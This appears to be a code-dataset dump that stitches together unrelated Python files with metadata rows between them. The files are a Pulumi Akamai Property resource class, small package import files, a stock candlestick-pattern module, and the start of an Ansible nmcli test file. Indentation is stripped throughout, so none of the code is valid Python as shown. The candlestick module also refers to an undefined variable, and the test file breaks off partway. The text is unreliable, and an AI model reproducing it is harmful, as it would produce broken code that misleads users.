def contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "contacts")
@contacts.setter
def contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "contacts", value)
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
"""
Contract ID to be assigned to the Property
"""
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter(name="cpCode")
def cp_code(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cp_code")
@cp_code.setter
def cp_code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cp_code", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
"""
Group ID to be assigned to the Property
"""
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def hostnames(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]:
return pulumi.get(self, "hostnames")
@hostnames.setter
def hostnames(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]):
pulumi.set(self, "hostnames", value)
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_secure")
@is_secure.setter
def is_secure(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_secure", value)
@property
@pulumi.getter(name="latestVersion")
def latest_version(self) -> Optional[pulumi.Input[int]]:
"""
Property's current latest version number
"""
return pulumi.get(self, "latest_version")
@latest_version.setter
def latest_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "latest_version", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name to give to the Property (must be unique)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def origins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]:
return pulumi.get(self, "origins")
@origins.setter
def origins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]):
pulumi.set(self, "origins", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
"""
Product ID to be assigned to the Property
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="productionVersion")
def production_version(self) -> Optional[pulumi.Input[int]]:
"""
Property's version currently activated in production (zero when not active in production)
"""
return pulumi.get(self, "production_version")
@production_version.setter
def production_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "production_version", value)
@property
@pulumi.getter(name="readVersion")
def read_version(self) -> Optional[pulumi.Input[int]]:
"""
Required property's version to be read
"""
return pulumi.get(self, "read_version")
@read_version.setter
def read_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_version", value)
@property
@pulumi.getter(name="ruleErrors")
def rule_errors(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleErrorArgs']]]]:
return pulumi.get(self, "rule_errors")
@rule_errors.setter
def rule_errors(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleErrorArgs']]]]):
pulumi.set(self, "rule_errors", value)
@property
@pulumi.getter(name="ruleFormat")
def rule_format(self) -> Optional[pulumi.Input[str]]:
"""
Specify the rule format version (defaults to latest version available when created)
"""
return pulumi.get(self, "rule_format")
@rule_format.setter
def rule_format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_format", value)
@property
@pulumi.getter(name="ruleWarnings")
def rule_warnings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]:
return pulumi.get(self, "rule_warnings")
@rule_warnings.setter
def rule_warnings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]):
pulumi.set(self, "rule_warnings", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[str]]:
"""
Property Rules as JSON
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rules", value)
@property
@pulumi.getter(name="stagingVersion")
def staging_version(self) -> Optional[pulumi.Input[int]]:
"""
Property's version currently activated in staging (zero when not active in staging)
"""
return pulumi.get(self, "staging_version")
@staging_version.setter
def staging_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "staging_version", value)
@property
@pulumi.getter
def variables(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "variables")
@variables.setter
def variables(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "variables", value)
warnings.warn("""akamai.properties.Property has been deprecated in favor of akamai.Property""", DeprecationWarning)
class Property(pulumi.CustomResource):
warnings.warn("""akamai.properties.Property has been deprecated in favor of akamai.Property""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyHostnameArgs']]]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyOriginArgs']]]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleWarningArgs']]]]] = None,
rules: Optional[pulumi.Input[str]] = None,
variables: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a Property resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[PropertyArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Property resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param PropertyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PropertyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyHostnameArgs']]]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyOriginArgs']]]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleWarningArgs']]]]] = None,
rules: Optional[pulumi.Input[str]] = None,
variables: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""Property is deprecated: akamai.properties.Property has been deprecated in favor of akamai.Property""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PropertyArgs.__new__(PropertyArgs)
if contacts is not None and not opts.urn:
warnings.warn("""The setting \"contact\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contacts is deprecated: The setting \"contact\" has been deprecated.""")
__props__.__dict__["contacts"] = contacts
if contract is not None and not opts.urn:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
if cp_code is not None and not opts.urn:
warnings.warn("""The setting \"cp_code\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""cp_code is deprecated: The setting \"cp_code\" has been deprecated.""")
__props__.__dict__["cp_code"] = cp_code
if group is not None and not opts.urn:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["hostnames"] = hostnames
if is_secure is not None and not opts.urn:
warnings.warn("""The setting \"is_secure\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""is_secure is deprecated: The setting \"is_secure\" has been deprecated.""")
__props__.__dict__["is_secure"] = is_secure
__props__.__dict__["name"] = name
if origins is not None and not opts.urn:
warnings.warn("""The setting \"origin\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""origins is deprecated: The setting \"origin\" has been deprecated.""")
__props__.__dict__["origins"] = origins
if product is not None and not opts.urn:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
__props__.__dict__["rule_format"] = rule_format
if rule_warnings is not None and not opts.urn:
warnings.warn("""Rule warnings will not be set in state anymore""", DeprecationWarning)
pulumi.log.warn("""rule_warnings is deprecated: Rule warnings will not be set in state anymore""")
__props__.__dict__["rule_warnings"] = rule_warnings
__props__.__dict__["rules"] = rules
if variables is not None and not opts.urn:
warnings.warn("""The setting \"variables\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""variables is deprecated: The setting \"variables\" has been deprecated.""")
__props__.__dict__["variables"] = variables
__props__.__dict__["latest_version"] = None
__props__.__dict__["production_version"] = None
__props__.__dict__["read_version"] = None
__props__.__dict__["rule_errors"] = None
__props__.__dict__["staging_version"] = None
super(Property, __self__).__init__(
'akamai:properties/property:Property',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyHostnameArgs']]]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
latest_version: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyOriginArgs']]]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
production_version: Optional[pulumi.Input[int]] = None,
read_version: Optional[pulumi.Input[int]] = None,
rule_errors: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleErrorArgs']]]]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleWarningArgs']]]]] = None,
rules: Optional[pulumi.Input[str]] = None,
staging_version: Optional[pulumi.Input[int]] = None,
variables: Optional[pulumi.Input[str]] = None) -> 'Property':
"""
Get an existing Property resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[int] latest_version: Property's current latest version number
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[int] production_version: Property's version currently activated in production (zero when not active in production)
:param pulumi.Input[int] read_version: Required property's version to be read
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
:param pulumi.Input[int] staging_version: Property's version currently activated in staging (zero when not active in staging)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PropertyState.__new__(_PropertyState)
__props__.__dict__["contacts"] = contacts
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
__props__.__dict__["cp_code"] = cp_code
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["hostnames"] = hostnames
__props__.__dict__["is_secure"] = is_secure
__props__.__dict__["latest_version"] = latest_version
__props__.__dict__["name"] = name
__props__.__dict__["origins"] = origins
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
__props__.__dict__["production_version"] = production_version
__props__.__dict__["read_version"] = read_version
__props__.__dict__["rule_errors"] = rule_errors
__props__.__dict__["rule_format"] = rule_format
__props__.__dict__["rule_warnings"] = rule_warnings
__props__.__dict__["rules"] = rules
__props__.__dict__["staging_version"] = staging_version
__props__.__dict__["variables"] = variables
return Property(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def contacts(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "contacts")
@property
@pulumi.getter
def contract(self) -> pulumi.Output[str]:
return pulumi.get(self, "contract")
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> pulumi.Output[str]:
"""
Contract ID to be assigned to the Property
"""
return pulumi.get(self, "contract_id")
@property
@pulumi.getter(name="cpCode")
def cp_code(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "cp_code")
@property
@pulumi.getter
def group(self) -> pulumi.Output[str]:
return pulumi.get(self, "group")
@property
@pulumi.getter(name="groupId")
def group_id(self) -> pulumi.Output[str]:
"""
Group ID to be assigned to the Property
"""
return pulumi.get(self, "group_id")
@property
@pulumi.getter
def hostnames(self) -> pulumi.Output[Optional[Sequence['outputs.PropertyHostname']]]:
return pulumi.get(self, "hostnames")
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "is_secure")
@property
@pulumi.getter(name="latestVersion")
def latest_version(self) -> pulumi.Output[int]:
"""
Property's current latest version number
"""
return pulumi.get(self, "latest_version")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name to give to the Property (must be unique)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def origins(self) -> pulumi.Output[Optional[Sequence['outputs.PropertyOrigin']]]:
return pulumi.get(self, "origins")
@property
@pulumi.getter
def product(self) -> pulumi.Output[str]:
return pulumi.get(self, "product")
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Output[str]:
"""
Product ID to be assigned to the Property
"""
return pulumi.get(self, "product_id")
@property
@pulumi.getter(name="productionVersion")
def production_version(self) -> pulumi.Output[int]:
"""
Property's version currently activated in production (zero when not active in production)
"""
return pulumi.get(self, "production_version")
@property
@pulumi.getter(name="readVersion")
def read_version(self) -> pulumi.Output[int]:
"""
Required property's version to be read
"""
return pulumi.get(self, "read_version")
@property
@pulumi.getter(name="ruleErrors")
def rule_errors(self) -> pulumi.Output[Sequence['outputs.PropertyRuleError']]:
return pulumi.get(self, "rule_errors")
@property
@pulumi.getter(name="ruleFormat")
def rule_format(self) -> pulumi.Output[str]:
"""
Specify the rule format version (defaults to latest version available when created)
"""
return pulumi.get(self, "rule_format")
@property
@pulumi.getter(name="ruleWarnings")
def rule_warnings(self) -> pulumi.Output[Sequence['outputs.PropertyRuleWarning']]:
return pulumi.get(self, "rule_warnings")
@property
@pulumi.getter
def rules(self) -> pulumi.Output[str]:
"""
Property Rules as JSON
"""
return pulumi.get(self, "rules")
@property
@pulumi.getter(name="stagingVersion")
def staging_version(self) -> pulumi.Output[int]:
"""
Property's version currently activated in staging (zero when not active in staging)
"""
return pulumi.get(self, "staging_version")
@property
@pulumi.getter
def variables(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "variables")
| 44.909766 | 142 | 0.638412 | 4,903 | 42,305 | 5.315113 | 0.03916 | 0.101305 | 0.11957 | 0.083576 | 0.915426 | 0.892364 | 0.868457 | 0.852072 | 0.839639 | 0.804221 | 0 | 0.000031 | 0.241437 | 42,305 | 941 | 143 | 44.957492 | 0.812035 | 0.124075 | 0 | 0.833815 | 1 | 0 | 0.171142 | 0.01394 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147399 | false | 0.001445 | 0.010116 | 0.046243 | 0.24711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c44e70e26e2aae7a184066da9cd3e62efc063db | 102 | py | Python | src/question_analysis/__init__.py | collab-uniba/qavmentor-service | f3c6f8a02bca3eeb0521ca3ac3b6e97542754c2a | [
"MIT"
] | 1 | 2018-07-23T14:42:22.000Z | 2018-07-23T14:42:22.000Z | src/question_analysis/__init__.py | collab-uniba/qavmentor-service | f3c6f8a02bca3eeb0521ca3ac3b6e97542754c2a | [
"MIT"
] | 56 | 2018-05-24T09:40:03.000Z | 2022-02-11T03:40:09.000Z | src/question_analysis/__init__.py | collab-uniba/qavmentor | 669025a40dd04cd8c9cbd264587918025ef39d20 | [
"MIT"
] | 1 | 2018-05-20T09:30:48.000Z | 2018-05-20T09:30:48.000Z | from question_analysis.feature_analysis import FeatureAnalysis
from question_analysis.post import Post | 51 | 62 | 0.911765 | 13 | 102 | 6.923077 | 0.538462 | 0.266667 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068627 | 102 | 2 | 63 | 51 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1c909d54401c8835058d67115b1de21c96da1e15 | 217 | py | Python | storage/icon_storage/actions/__init__.py | killstrelok/insightconnect-plugins | 911358925f4233ab273dbd8172e8b7b9188ebc01 | [
"MIT"
] | 1 | 2020-03-18T09:14:55.000Z | 2020-03-18T09:14:55.000Z | storage/icon_storage/actions/__init__.py | killstrelok/insightconnect-plugins | 911358925f4233ab273dbd8172e8b7b9188ebc01 | [
"MIT"
] | 1 | 2021-02-23T23:57:37.000Z | 2021-02-23T23:57:37.000Z | storage/icon_storage/actions/__init__.py | killstrelok/insightconnect-plugins | 911358925f4233ab273dbd8172e8b7b9188ebc01 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
from .check_for_variable.action import CheckForVariable
from .delete_variable.action import DeleteVariable
from .retrieve.action import Retrieve
from .store.action import Store
| 36.166667 | 55 | 0.83871 | 30 | 217 | 5.966667 | 0.6 | 0.268156 | 0.223464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115207 | 217 | 5 | 56 | 43.4 | 0.932292 | 0.170507 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
98bda94b43e28eb8cb27fcaa472aa2072fdd8233 | 101 | py | Python | run_all_scrapes.py | sbertazz/timeline | 05ba1da7724286290b7a536ecbfad36b4498486c | [
"MIT"
] | null | null | null | run_all_scrapes.py | sbertazz/timeline | 05ba1da7724286290b7a536ecbfad36b4498486c | [
"MIT"
] | null | null | null | run_all_scrapes.py | sbertazz/timeline | 05ba1da7724286290b7a536ecbfad36b4498486c | [
"MIT"
] | null | null | null | import scrapes.ita_scrape
import scrapes.uk_scrape
import scrapes.us_scrape
import scrapes.gr_scrape
| 20.2 | 25 | 0.881188 | 16 | 101 | 5.3125 | 0.4375 | 0.611765 | 0.670588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079208 | 101 | 4 | 26 | 25.25 | 0.913978 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c719228ff5f5be8d9d02c02d57965c0db2b5b3f4 | 3,952 | py | Python | lib/stolgo/candlestick.py | stockalgo/stolgo | 8f697da41f9684bc36a94cce7a1b4824334f012a | [
"MIT"
] | 125 | 2020-05-24T19:37:25.000Z | 2022-03-10T10:15:20.000Z | lib/stolgo/candlestick.py | StreamAlpha/stolgo | 5e489fd8f8cdcec1af1e466efe15176e7c961ab3 | [
"MIT"
] | 84 | 2020-05-05T13:04:38.000Z | 2021-12-21T01:51:42.000Z | lib/stolgo/candlestick.py | mhn0497/stolgo | 8f697da41f9684bc36a94cce7a1b4824334f012a | [
"MIT"
] | 38 | 2020-05-05T17:05:26.000Z | 2022-02-25T15:30:16.000Z | from stolgo.exception import BadDataError
class CandleStick:
def is_bearish_candle(self,candle):
return candle["Close"] < candle["Open"]
def is_bullish_candle(self,candle):
return candle["Close"] > candle["Open"]
def is_bullish_engulfing(self,candles,pos=-1):
if candles.shape[0] < 2:
raise BadDataError("Minimun two candles require")
curr_candle = candles.iloc[pos]
prev_candle = candles.iloc[pos-1]
#check for pattern
if (self.is_bearish_candle(prev_candle)\
and curr_candle["Close"] > prev_candle["Open"] \
and curr_candle["Open"] <prev_candle["Close"]):
return True
return False
def is_hammer_candle(self,candle,pos=-1,lower_wick = 0.6, body = 0.2, upper_wick = 0.2):
curr_candle = candle.iloc[pos]
if candles.shape[0] < 1:
raise BadDataError("Minimun one candles require")
candle_length = curr_candle["High"] - curr_candle["Low"]
if self.is_bullish_candle(curr_candle):
candle_upper_wick = curr_candle["High"]-curr_candle["Close"]
candle_lower_wick = curr_candle["Open"]-curr_candle["Low"]
candle_body = curr_candle["Close"] - curr_candle["Open"]
if candle_body <= body * candle_length and candle_upper_wick <= upper_wick * candle_length:
return True
elif self.is_bearish_candle(curr_candle):
candle_upper_wick = curr_candle["High"]-curr_candle["Open"]
candle_lower_wick = curr_candle["Close"]-curr_candle["Low"]
candle_body = curr_candle["Open"] - curr_candle["Close"]
if candle_body <= body * candle_length and candle_upper_wick <= upper_wick * candle_length:
return True
return False
def is_inverse_hammer_candle(self,candle,pos=-1,lower_wick = 0.2, body = 0.2, upper_wick = 0.6):
curr_candle = candle.iloc[pos]
candle_length = curr_candle["High"] - curr_candle["Low"]
if self.is_bullish_candle(curr_candle):
candle_body = curr_candle["Close"] - curr_candle["Open"]
candle_upper_wick = curr_candle["High"]-curr_candle["Close"]
candle_lower_wick = curr_candle["Open"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_lower_wick <= lower_wick * candle_length:
return True
elif self.is_bearish_candle(curr_candle):
candle_body = curr_candle["Open"] - curr_candle["Close"]
candle_upper_wick = curr_candle["Open"]-curr_candle["High"]
candle_lower_wick = curr_candle["Close"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_lower_wick <= lower_wick * candle_length:
return True
return False
def is_doji_candle(self,candle,pos=-1,lower_wick = 0.4, body = 0.02, upper_wick = 0.4):
curr_candle = candle.iloc[pos]
candle_length = curr_candle["High"] - curr_candle["Low"]
if self.is_bullish_candle(curr_candle):
candle_body = curr_candle["Close"] - curr_candle["Open"]
candle_upper_wick = curr_candle["High"]-curr_candle["Close"]
candle_lower_wick = curr_candle["Open"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_upper_wick >= upper_wick*candle_length and candle_lower_wick >= lower_wick*candle_length:
return True
elif self.is_bearish_candle(curr_candle):
candle_body = curr_candle["Open"] - curr_candle["Close"]
candle_upper_wick = curr_candle["High"]-curr_candle["Open"]
candle_lower_wick = curr_candle["Close"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_upper_wick >= upper_wick*candle_length and candle_lower_wick >= lower_wick*candle_length:
return True
return False | 52.693333 | 151 | 0.643978 | 511 | 3,952 | 4.651663 | 0.101761 | 0.227177 | 0.082036 | 0.060581 | 0.831721 | 0.822045 | 0.791754 | 0.791754 | 0.746319 | 0.707194 | 0 | 0.009409 | 0.246964 | 3,952 | 75 | 152 | 52.693333 | 0.789315 | 0.004302 | 0 | 0.69697 | 0 | 0 | 0.066328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.015152 | 0.030303 | 0.318182 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c732c1e61d070ba6f5319cfc49bad07bf0c1ffef | 83,144 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/net_tools/test_nmcli.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/net_tools/test_nmcli.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/net_tools/test_nmcli.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # Copyright: (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import pytest
from ansible.module_utils.common.text.converters import to_text
from ansible_collections.community.general.plugins.modules.net_tools import nmcli
pytestmark = pytest.mark.usefixtures('patch_ansible_module')
TESTCASE_CONNECTION = [
{
'type': 'ethernet',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'team',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'bond',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'bond-slave',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'bridge',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'vlan',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
